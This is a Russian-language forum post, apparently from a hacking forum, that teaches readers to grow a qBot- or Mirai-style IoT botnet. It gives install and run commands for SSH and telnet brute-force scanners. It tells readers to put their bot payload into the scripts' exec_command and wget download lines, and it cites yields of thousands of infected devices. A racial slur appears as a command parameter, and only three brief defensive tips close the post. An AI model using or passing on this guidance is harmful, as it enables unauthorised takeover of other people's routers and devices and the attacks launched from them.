Как распространяться в интернете вещей.

1xbet 1xbet лучшие приватные читы

Jackson.

Авторитет
Реакции
648
Приветствую всех пользователей данного форума
И сегодня мы поговорим о том, как распространять свой ботнет в IoT и как защитить свой роутер или умный холодильник от Mirai, qBot и им подобных

Удивительно, почему эта тема почти не затронула Россию, хотя бурные обсуждения на англоязычных форумах начались еще осенью прошлого года.

Рассматривать будем на примере qBot.
Итак, после того, как у нас все готово и мы видим в счетчике ботов 0, конечно же в голову приходит мысль "а что если бы этот счетчик был хотя бы на 1-2к побольше?". Отсюда у нас несколько вариантов.

Первый и самый банальный - масскан и брутфорс паролей от устройств интернета вещей. Так распространялся Mirai, с него пожалуй и начнем.
Собственно, для этого нам потребуется для масскана (можно использовать и классический масскан, но тогда придется распарсить его вывод под брутфорсер) и . Вот тут-то нам и пригодится описанный мной в прошлой статье пейлоад. Его нужно вставить в ssh.exec_command("") внизу скрипта (если что, я беру hl.py в качестве скрипта).

В зависимостях у этого скрипта только Python и библиотека Paramiko под него же. Screen поставим для того, чтобы запустить скрипт в нем и забыть о его существовании.

Для Debian установка зависимостей будет такой:
Код
sudo apt-get install python python-paramiko screen -y

После этого просто запускаем скрипт:
Код
sudo screen python hl.py 500 NIGGER 1 1

Или с другими параметрами, все параметры указаны в самом файле сканнера.
Наслаждаемся быстрым приростом и понимаем, что это ненадолго. Увы, скрипт, хоть и в состоянии сбрутить 100-400 ботов за полчаса, столь же быстро и теряет позиции. Это из-за того, что такой метод распространения используют почти все в США, qBot тоже. Соотвественно, бинарники конфликтуют, даже вытесняют друг друга, и получается не пойми что. В целом неплохой вариант для быстрого брута, но позиции потеряете настолько же быстро.

Теперь рассмотрим LRAB, то есть к ssh добавим еще и telnet. Почти таким же способом размножался и Mirai, но там все немного сложнее. Мираевский лоадер умел echoload'ить, то есть заливать бинарники посредством команды echo, что очень круто по меркам IoT-ботнетов. Плюс была функция self-rep (размножение самого себя) в которой я так и не разобрался. У нас тут такого нет.
Смотрим LRAB. В основом нам тут понадобится только скрипт class, этакая альтернатива масскану. Опять же ставим зависимости, добавляется еще perl и пакеты libnet-ssh и libnet-telnet. В Redhat'ах достаточно поставить Net::SSH и Net::Telnet из CPAN.
Когда у нас все готово, пишем
Код
sudo screen ./class 23 -i eth0 -s 10
, где 23 - порт, eth0 - интерфейс для скана (если у вас виртуалка, используйте только KVM-виртуализацию, VMware не поддерживает скан).

Ждем, пока просканится нужное нам количество устройств. Потом нам необходимо привести сканы в вид login:pass:ip. Я, к примеру, просто беру и парсю все результаты скана в этот вид. Дальше брутер сам отсеет ненужное и подгрузит гуды. Парсер легко написать самим, но если уж совсем невмоготу, можете стукнуть в ПМ и я вам его дам.

Наконец, нам нужно пройти и подцепить отсюда файл telnet.pl. Не забываем прописывать в $telnet->cmd("wget "); свой пэйлоад вместо wget.

Теперь идем пить чай, спать. Все это делать придется примерно 3 дня, время от времени судорожно проверяя счетчик. С этого уже может при хорошей погоде накапать 2-10к ботов.

Второй способ - комбинация 1-day эксплоитов с пейлоадом бота, но тут я уже не буду распространяться - у всех есть свои секреты.
В целом я рассказал о забугорной технике спрединга чуть более, чем полностью. 99% ботоводов используют именно эти методы.

В заключение, как же защититься от всего этого:
1) Не ставить легкие пароли, даже если ваш роутер не имеет выделенного IPv4-адреса
2) Вовремя прошивать свои железяки (если прошивки под них вообще выходят)
3) Поставить OpenWRT, там можно запилить множество классных фич для защиты от подобного

kaspersky keys
Верх